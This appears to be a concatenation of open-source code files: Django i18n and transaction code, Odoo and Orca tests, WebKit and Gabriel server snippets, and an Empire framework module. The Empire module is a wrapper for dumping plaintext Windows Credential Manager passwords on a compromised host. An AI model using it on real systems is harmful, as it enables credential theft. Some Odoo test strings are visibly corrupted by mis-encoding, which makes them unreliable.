filemsg = ''
if origin:
filemsg = 'file %s, ' % origin
raise SyntaxError(
"Translation blocks must not include other block tags: "
"%s (%sline %d)" % (t.contents, filemsg, t.lineno)
)
elif t.token_type == TOKEN_VAR:
if inplural:
plural.append('%%(%s)s' % t.contents)
else:
singular.append('%%(%s)s' % t.contents)
elif t.token_type == TOKEN_TEXT:
contents = t.contents.replace('%', '%%')
if inplural:
plural.append(contents)
else:
singular.append(contents)
else:
# Handle comment tokens (`{# ... #}`) plus other constructs on
# the same line:
if comment_lineno_cache is not None:
cur_lineno = t.lineno + t.contents.count('\n')
if comment_lineno_cache == cur_lineno:
if t.token_type != TOKEN_COMMENT:
for c in lineno_comment_map[comment_lineno_cache]:
filemsg = ''
if origin:
filemsg = 'file %s, ' % origin
warn_msg = ("The translator-targeted comment '%s' "
"(%sline %d) was ignored, because it wasn't the last item "
"on the line.") % (c, filemsg, comment_lineno_cache)
warnings.warn(warn_msg, TranslatorCommentWarning)
lineno_comment_map[comment_lineno_cache] = []
else:
out.write('# %s' % ' | '.join(lineno_comment_map[comment_lineno_cache]))
comment_lineno_cache = None
if t.token_type == TOKEN_BLOCK:
imatch = inline_re.match(t.contents)
bmatch = block_re.match(t.contents)
cmatches = constant_re.findall(t.contents)
if imatch:
g = imatch.group(1)
if g[0] == '"':
g = g.strip('"')
elif g[0] == "'":
g = g.strip("'")
g = g.replace('%', '%%')
if imatch.group(2):
# A context is provided
context_match = context_re.match(imatch.group(2))
message_context = context_match.group(1)
if message_context[0] == '"':
message_context = message_context.strip('"')
elif message_context[0] == "'":
message_context = message_context.strip("'")
out.write(' pgettext(%r, %r) ' % (message_context, g))
message_context = None
else:
out.write(' gettext(%r) ' % g)
elif bmatch:
for fmatch in constant_re.findall(t.contents):
out.write(' _(%s) ' % fmatch)
if bmatch.group(1):
# A context is provided
context_match = context_re.match(bmatch.group(1))
message_context = context_match.group(1)
if message_context[0] == '"':
message_context = message_context.strip('"')
elif message_context[0] == "'":
message_context = message_context.strip("'")
intrans = True
inplural = False
trimmed = 'trimmed' in t.split_contents()
singular = []
plural = []
elif cmatches:
for cmatch in cmatches:
out.write(' _(%s) ' % cmatch)
elif t.contents == 'comment':
incomment = True
else:
out.write(blankout(t.contents, 'B'))
elif t.token_type == TOKEN_VAR:
parts = t.contents.split('|')
cmatch = constant_re.match(parts[0])
if cmatch:
out.write(' _(%s) ' % cmatch.group(1))
for p in parts[1:]:
if p.find(':_(') >= 0:
out.write(' %s ' % p.split(':', 1)[1])
else:
out.write(blankout(p, 'F'))
elif t.token_type == TOKEN_COMMENT:
if t.contents.lstrip().startswith(TRANSLATOR_COMMENT_MARK):
lineno_comment_map.setdefault(t.lineno,
[]).append(t.contents)
comment_lineno_cache = t.lineno
else:
out.write(blankout(t.contents, 'X'))
return out.getvalue()
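# Hedged sketch of templatize()'s effect (requires configured Django settings;
# the template string below is hypothetical): translation tags become gettext()
# calls that xgettext can extract, while the remaining template text is blanked
# out character-for-character so line numbers still line up.
#
#   templatize("{% trans 'Greeting' %} plain text")
#   # -> something like " gettext(u'Greeting') " followed by " XXXXX XXXX"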
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format error in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string.lower())
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i:i + 3]
if first:
return []
if priority:
try:
priority = float(priority)
except ValueError:
return []
if not priority: # if priority is 0.0 at this point make it 1.0
priority = 1.0
result.append((lang, priority))
result.sort(key=lambda k: k[1], reverse=True)
return result
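# Hedged usage sketch (not part of the original module): entries without an
# explicit q-value default to 1.0 and the result is sorted by descending
# priority.
#
#   parse_accept_lang_header("en-gb,en;q=0.8,fr;q=0.5")
#   # -> [('en-gb', 1.0), ('en', 0.8), ('fr', 0.5)]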
|
mit
|
pierce403/EmpirePanel
|
lib/modules/credentials/enum_cred_store.py
|
1
|
1940
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'enum_cred_store',
'Author': ['BeetleChunks'],
'Description': ('Dumps plaintext credentials from the Windows Credential Manager for the current interactive user.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': ['The powershell used is based on JimmyJoeBob Alooba\'s CredMan script.\nhttps://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
scriptPath = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
scriptCmd = "Invoke-X"
try:
f = open(scriptPath, 'r')
except:
print helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath))
return ""
script = f.read()
f.close()
script += "\n%s" %(scriptCmd)
return script
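# Hedged usage sketch (the mainMenu object and agent name are hypothetical):
# options are passed as [Name, Value] pairs and generate() returns the
# PowerShell source with the "Invoke-X" trigger appended.
#
#   m = Module(mainMenu, params=[("Agent", "WXYZ1234")])
#   script = m.generate()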
|
bsd-3-clause
|
apanju/odoo
|
openerp/addons/test_inherits/models.py
|
295
|
1141
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api, osv
# We just create a new model
class Unit(models.Model):
_name = 'test.unit'
_columns = {
'name': osv.fields.char('Name', required=True),
'state': osv.fields.selection([('a', 'A'), ('b', 'B')],
string='State'),
}
surname = fields.Char(compute='_compute_surname')
@api.one
@api.depends('name')
def _compute_surname(self):
self.surname = self.name or ''
# We want to _inherits from the parent model and we add some fields
# in the child object
class Box(models.Model):
_name = 'test.box'
_inherits = {'test.unit': 'unit_id'}
unit_id = fields.Many2one('test.unit', 'Unit', required=True,
ondelete='cascade')
field_in_box = fields.Char('Field1')
# We add a third level of _inherits
class Pallet(models.Model):
_name = 'test.pallet'
_inherits = {'test.box': 'box_id'}
box_id = fields.Many2one('test.box', 'Box', required=True,
ondelete='cascade')
field_in_pallet = fields.Char('Field2')
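# Hedged usage sketch (assumes a test environment `env`): because of the
# _inherits chain, creating a pallet transparently creates the delegated box
# and unit records, and the unit's fields are readable from the pallet.
#
#   pallet = env['test.pallet'].create({'name': 'P1'})
#   pallet.name                  # 'P1', stored on the auto-created test.unit
#   pallet.box_id.unit_id.name   # also 'P1'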
|
agpl-3.0
|
adw0rd/lettuce
|
tests/integration/lib/Django-1.2.5/django/db/transaction.py
|
45
|
12689
|
"""
This module implements a transaction manager that can be used to define
transaction handling in a request or view function. It is used by transaction
control middleware and decorators.
The transaction manager can be in managed or in auto state. Auto state means the
system is using a commit-on-save strategy (actually it's more like
commit-on-change). As soon as the .save() or .delete() (or related) methods are
called, a commit is made.
Managed transactions don't do those commits, but will need some kind of manual
or implicit commits or rollbacks.
"""
try:
import thread
except ImportError:
import dummy_thread as thread
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.db import connections, DEFAULT_DB_ALIAS
from django.conf import settings
class TransactionManagementError(Exception):
"""
This exception is thrown when something bad happens with transaction
management.
"""
pass
# The states are dictionaries of dictionaries of lists. The key to the outer
# dict is the current thread, and the key to the inner dictionary is the
# connection alias and the list is handled as a stack of values.
state = {}
savepoint_state = {}
# The dirty flag is set by *_unless_managed functions to denote that the
# code under transaction management has changed things to require a
# database commit.
# This is a dictionary mapping thread to a dictionary mapping connection
# alias to a boolean.
dirty = {}
def enter_transaction_management(managed=True, using=None):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
state[thread_ident][using].append(state[thread_ident][using][-1])
else:
state.setdefault(thread_ident, {})
state[thread_ident][using] = [settings.TRANSACTIONS_MANAGED]
if thread_ident not in dirty or using not in dirty[thread_ident]:
dirty.setdefault(thread_ident, {})
dirty[thread_ident][using] = False
connection._enter_transaction_management(managed)
def leave_transaction_management(using=None):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._leave_transaction_management(is_managed(using=using))
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
del state[thread_ident][using][-1]
else:
raise TransactionManagementError("This code isn't under transaction management")
if dirty.get(thread_ident, {}).get(using, False):
rollback(using=using)
raise TransactionManagementError("Transaction managed block ended with pending COMMIT/ROLLBACK")
dirty[thread_ident][using] = False
def is_dirty(using=None):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return dirty.get(thread.get_ident(), {}).get(using, False)
def set_dirty(using=None):
"""
Sets a dirty flag for the current thread and code streak. This can be used
in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = True
else:
raise TransactionManagementError("This code isn't under transaction management")
def set_clean(using=None):
"""
Resets a dirty flag for the current thread and code streak. This can be used
in a managed block of code to decide whether a commit or rollback
should happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = False
else:
raise TransactionManagementError("This code isn't under transaction management")
clean_savepoints(using=using)
def clean_savepoints(using=None):
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
del savepoint_state[thread_ident][using]
def is_managed(using=None):
"""
Checks whether the transaction manager is in manual or in auto state.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in state and using in state[thread_ident]:
if state[thread_ident][using]:
return state[thread_ident][using][-1]
return settings.TRANSACTIONS_MANAGED
def managed(flag=True, using=None):
"""
Puts the transaction manager into a manual state: managed transactions have
to be committed explicitly by the user. If you switch off transaction
management and there is a pending commit/rollback, the data will be
committed.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
top = state.get(thread_ident, {}).get(using, None)
if top:
top[-1] = flag
if not flag and is_dirty(using=using):
connection._commit()
set_clean(using=using)
else:
raise TransactionManagementError("This code isn't under transaction management")
def commit_unless_managed(using=None):
"""
Commits changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._commit()
clean_savepoints(using=using)
else:
set_dirty(using=using)
def rollback_unless_managed(using=None):
"""
Rolls back changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._rollback()
else:
set_dirty(using=using)
def commit(using=None):
"""
Does the commit itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._commit()
set_clean(using=using)
def rollback(using=None):
"""
This function does the rollback itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._rollback()
set_clean(using=using)
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
savepoint_state[thread_ident][using].append(None)
else:
savepoint_state.setdefault(thread_ident, {})
savepoint_state[thread_ident][using] = [None]
tid = str(thread_ident).replace('-', '')
sid = "s%s_x%d" % (tid, len(savepoint_state[thread_ident][using]))
connection._savepoint(sid)
return sid
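# Hedged usage sketch (hypothetical model and exception names; requires a
# backend with savepoint support): part of a managed transaction can be rolled
# back without discarding earlier work.
#
#   sid = savepoint()
#   try:
#       Author.objects.create(name="duplicate")
#   except IntegrityError:
#       savepoint_rollback(sid)
#   else:
#       savepoint_commit(sid)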
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_commit(sid)
##############
# DECORATORS #
##############
def autocommit(using=None):
"""
Decorator that activates commit on save. This is Django's default behavior;
this decorator is useful if you globally activated transaction management in
your settings file and want the default behavior in some view functions.
"""
def inner_autocommit(func, db=None):
def _autocommit(*args, **kw):
try:
enter_transaction_management(managed=False, using=db)
managed(False, using=db)
return func(*args, **kw)
finally:
leave_transaction_management(using=db)
return wraps(func)(_autocommit)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_autocommit(using, DEFAULT_DB_ALIAS)
return lambda func: inner_autocommit(func, using)
def commit_on_success(using=None):
"""
This decorator activates commit on response. This way, if the view function
runs successfully, a commit is made; if the view function produces an exception,
a rollback is made. This is one of the most common ways to do transaction
control in Web apps.
"""
def inner_commit_on_success(func, db=None):
def _commit_on_success(*args, **kw):
try:
enter_transaction_management(using=db)
managed(True, using=db)
try:
res = func(*args, **kw)
except:
# All exceptions must be handled here (even string ones).
if is_dirty(using=db):
rollback(using=db)
raise
else:
if is_dirty(using=db):
try:
commit(using=db)
except:
rollback(using=db)
raise
return res
finally:
leave_transaction_management(using=db)
return wraps(func)(_commit_on_success)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_commit_on_success(using, DEFAULT_DB_ALIAS)
return lambda func: inner_commit_on_success(func, using)
def commit_manually(using=None):
"""
Decorator that activates manual transaction control. It just disables
automatic transaction control and doesn't do any commit/rollback of its
own -- it's up to the user to call the commit and rollback functions
themselves.
"""
def inner_commit_manually(func, db=None):
def _commit_manually(*args, **kw):
try:
enter_transaction_management(using=db)
managed(True, using=db)
return func(*args, **kw)
finally:
leave_transaction_management(using=db)
return wraps(func)(_commit_manually)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_commit_manually(using, DEFAULT_DB_ALIAS)
return lambda func: inner_commit_manually(func, using)
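# Hedged usage sketch (view names are hypothetical): each decorator wraps a
# function in the corresponding transaction strategy described above.
#
#   @commit_on_success
#   def create_author(request):
#       ...   # committed on success, rolled back on exception
#
#   @commit_manually
#   def import_data(request):
#       ...   # the function body must call commit() or rollback() itself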
|
gpl-3.0
|
StevenBlack/phantomjs
|
src/qt/qtwebkit/Tools/QueueStatusServer/handlers/updatebase.py
|
143
|
1902
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.api import users
from google.appengine.ext import webapp, db
class UpdateBase(webapp.RequestHandler):
def _int_from_request(self, name):
string_value = self.request.get(name)
try:
int_value = int(string_value)
return int_value
except (ValueError, TypeError):
pass
return None
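# Hedged usage sketch (inside a subclass handler; the query parameter name is
# hypothetical): malformed integers come back as None instead of raising.
#
#   attachment_id = self._int_from_request("attachment_id")
#   if attachment_id is None:
#       self.error(400)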
|
bsd-3-clause
|
sultanoid/Gabriel
|
server/gabriel/common/protocol.py
|
1
|
2299
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
# Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Protocol_client(object):
JSON_KEY_CONTROL_MESSAGE = "control"
JSON_KEY_RESULT_MESSAGE = "result"
JSON_KEY_FRAME_ID = "frame_id"
JSON_KEY_ENGINE_ID = "engine_id"
JSON_KEY_TOKEN_INJECT = "token_inject"
JSON_KEY_STATUS = "status"
JSON_KEY_DATA_SIZE = "data_size"
class Protocol_sensor(object):
JSON_KEY_SENSOR_TYPE = "sensor_type"
JSON_VALUE_SENSOR_TYPE_JPEG = "mjpeg"
JSON_VALUE_SENSOR_TYPE_ACC = "acc"
JSON_VALUE_SENSOR_TYPE_GPS = "gps"
JSON_VALUE_SENSOR_TYPE_AUDIO = "audio"
class Protocol_measurement(object):
JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME = "control_recv_from_mobile_time"
JSON_KEY_APP_RECV_TIME = "app_recv_time"
JSON_KEY_APP_SYMBOLIC_TIME = "app_symbolic_time"
JSON_KEY_APP_SENT_TIME = "app_sent_time"
JSON_KEY_UCOMM_RECV_TIME = "ucomm_recv_time"
JSON_KEY_UCOMM_SENT_TIME = "ucomm_sent_time"
JSON_KEY_CONTROL_SENT_TO_MOBILE_TIME = "control_sent_to_mobile_time"
class Protocol_result(object):
JSON_KEY_STATUS = "status"
JSON_KEY_IMAGE = "image"
JSON_KEY_SPEECH = "speech"
JSON_KEY_IMAGES_ANIMATION = "animation"
JSON_KEY_VIDEO = "video"
class Protocol_control(object):
JSON_KEY_SENSOR_TYPE_IMAGE = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_JPEG
JSON_KEY_SENSOR_TYPE_ACC = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_ACC
JSON_KEY_SENSOR_TYPE_AUDIO = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_AUDIO
JSON_KEY_FPS = "fps"
JSON_KEY_IMG_WIDTH = "img_width"
JSON_KEY_IMG_HEIGHT = "img_height"
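# Hedged usage sketch (values are hypothetical): the classes above are plain
# namespaces of JSON key strings, typically used when assembling a header.
#
#   import json
#   header = json.dumps({
#       Protocol_client.JSON_KEY_FRAME_ID: 42,
#       Protocol_client.JSON_KEY_STATUS: "success",
#       Protocol_result.JSON_KEY_SPEECH: "traffic light ahead",
#   })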
|
apache-2.0
|
OCA/partner-contact
|
partner_second_lastname/tests/test_name.py
|
1
|
7044
|
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
# Copyright 2015 Grupo ESOC Ingeniería de Servicios, S.L.U.
# Copyright 2015 Antiun Ingenieria S.L. - Antonio Espinosa
from odoo.tests.common import TransactionCase
from odoo.addons.partner_firstname.tests.base import MailInstalled
class CompanyCase(TransactionCase):
"""Test ``res.partner`` when it is a company."""
def setUp(self):
super(CompanyCase, self).setUp()
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
def tearDown(self):
try:
new = self.env["res.partner"].create(
{"is_company": True, "name": self.name}
)
# Name should be cleaned of unneeded whitespace
clean_name = " ".join(self.name.split(None))
# Check it's saved OK
self.assertEqual(new.name, clean_name, "Saved company name is wrong.")
# Check it's saved in the lastname
self.assertEqual(
new.lastname,
clean_name,
"Company name should be saved in the lastname field.",
)
# Check that other fields are empty
self.assertEqual(
new.firstname, False, "Company first name must always be empty."
)
self.assertEqual(
new.lastname2, False, "Company last name 2 must always be empty."
)
finally:
super(CompanyCase, self).tearDown()
def test_long_name(self):
"""Create a company with a long name."""
self.name = "Sรถme very lรณng nรขme"
def test_short_name(self):
"""Create a company with a short name."""
self.name = "Shoลt"
def test_whitespace_before(self):
"""Create a company with name prefixed with whitespace."""
self.name = " Wฤฅitespace befรฒre"
def test_whitespace_after(self):
"""Create a company with name suffixed with whitespace."""
self.name = "Whitespรขce aftรฉr "
def test_whitespace_inside(self):
"""Create a company with whitespace inside the name."""
self.name = "Whitespacรฉ รฏnside"
def test_whitespace_everywhere(self):
"""Create a company with whitespace everywhere in the name."""
self.name = " A lot รถf whitespace "
class PersonCase(TransactionCase):
"""Test ``res.partner`` when it is a person."""
model = "res.partner"
context = dict()
def setUp(self):
super(PersonCase, self).setUp()
self.env["ir.config_parameter"].set_param(
"partner_names_order", "last_first_comma"
)
self.firstname = "Fรญrstname"
self.lastname = "Lร stname1"
self.lastname2 = "Lรขstname2"
self.template = "%(last1)s %(last2)s, %(first)s"
def tearDown(self):
try:
new = self.env[self.model].with_context(self.context).create(self.params)
# Check that each individual field matches
self.assertEqual(self.firstname, new.firstname, "First name saved badly.")
self.assertEqual(self.lastname, new.lastname, "Last name 1 saved badly.")
self.assertEqual(self.lastname2, new.lastname2, "Last name 2 saved badly.")
# Check that name gets saved fine
self.assertEqual(
self.template
% (
{
"last1": self.lastname,
"last2": self.lastname2,
"first": self.firstname,
}
),
new.name,
"Name saved badly.",
)
finally:
super(PersonCase, self).tearDown()
def test_firstname_first(self):
"""Create a person setting his first name first."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.template = "%(first)s %(last1)s %(last2)s"
self.params = {
"is_company": False,
"name": "{} {} {}".format(self.firstname, self.lastname, self.lastname2),
}
def test_firstname_last(self):
"""Create a person setting his first name last."""
self.params = {
"is_company": False,
"name": "{} {}, {}".format(self.lastname, self.lastname2, self.firstname),
}
def test_firstname_last_wo_comma(self):
"""Create a person setting his first name last and the order as 'last_first'"""
self.env["ir.config_parameter"].set_param("partner_names_order", "last_first")
self.template = "%(last1)s %(last2)s %(first)s"
self.params = {
"is_company": False,
"name": "{} {} {}".format(self.lastname, self.lastname2, self.firstname),
}
def test_firstname_only(self):
"""Create a person setting his first name only."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.firstname = self.lastname2 = False
self.template = "%(last1)s"
self.params = {
"is_company": False,
"name": self.lastname,
}
def test_firstname_lastname_only(self):
"""Create a person setting his first name and last name 1 only."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.lastname2 = False
self.template = "%(first)s %(last1)s"
self.params = {
"is_company": False,
"name": "{} {}".format(self.firstname, self.lastname),
}
def test_lastname_firstname_only(self):
"""Create a person setting his last name 1 and first name only."""
self.lastname2 = False
self.template = "%(last1)s, %(first)s"
self.params = {
"is_company": False,
"name": "{}, {}".format(self.lastname, self.firstname),
}
def test_lastname_firstname_only_wo_comma(self):
"""Create a person setting his last name 1 and first name only.
Set order to 'last_first' to test name split without comma"""
self.env["ir.config_parameter"].set_param("partner_names_order", "last_first")
self.lastname2 = False
self.template = "%(last1)s %(first)s"
self.params = {
"is_company": False,
"name": "{} {}".format(self.lastname, self.firstname),
}
def test_separately(self):
"""Create a person setting separately all fields."""
self.params = {
"is_company": False,
"firstname": self.firstname,
"lastname": self.lastname,
"lastname2": self.lastname2,
}
class UserCase(PersonCase, MailInstalled):
"""Test ``res.users``."""
model = "res.users"
context = {"default_login": "user@example.com"}
def tearDown(self):
# Skip if ``mail`` is installed
if not self.mail_installed():
super(UserCase, self).tearDown()
|
agpl-3.0
|
GNOME/orca
|
test/keystrokes/gtk3-demo/role_column_header.py
|
1
|
5313
|
#!/usr/bin/python
"""Test of column header output."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("End"))
sequence.append(KeyComboAction("<Shift>Right"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Return"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>ISO_Left_Tab"))
sequence.append(utils.AssertPresentationAction(
"1. Bug number column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Bug number table column header'",
" VISIBLE: 'Bug number table column header', cursor=1",
"SPEECH OUTPUT: 'Bug number table column header not selected'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"2. Severity column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity table column header'",
" VISIBLE: 'Severity table column header', cursor=1",
"SPEECH OUTPUT: 'Severity table column header'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"3. Description column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Description table column header'",
" VISIBLE: 'Description table column header', cursor=1",
"SPEECH OUTPUT: 'Description table column header'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
"4. Enter table",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Fixed? column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: '< > Fixed? 60482 Normal scrollab', cursor=1",
"SPEECH OUTPUT: 'Fixed?'",
"SPEECH OUTPUT: 'check box not checked.'",
"SPEECH OUTPUT: '60482.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'scrollable notebooks and hidden tabs.'",
"SPEECH OUTPUT: 'image.'"]))
# GtkTreeView swallows this keypress (for all users; not just Orca users).
sequence.append(KeyComboAction("Left"))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
"5. Normal cell",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'Severity column header Normal.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"6. Normal cell basic Where Am I",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"7. Normal cell detailed Where Am I",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'",
"SPEECH OUTPUT: 'Fixed?'",
"SPEECH OUTPUT: 'check box not checked.'",
"SPEECH OUTPUT: '60482.'",
"SPEECH OUTPUT: 'Normal.'",
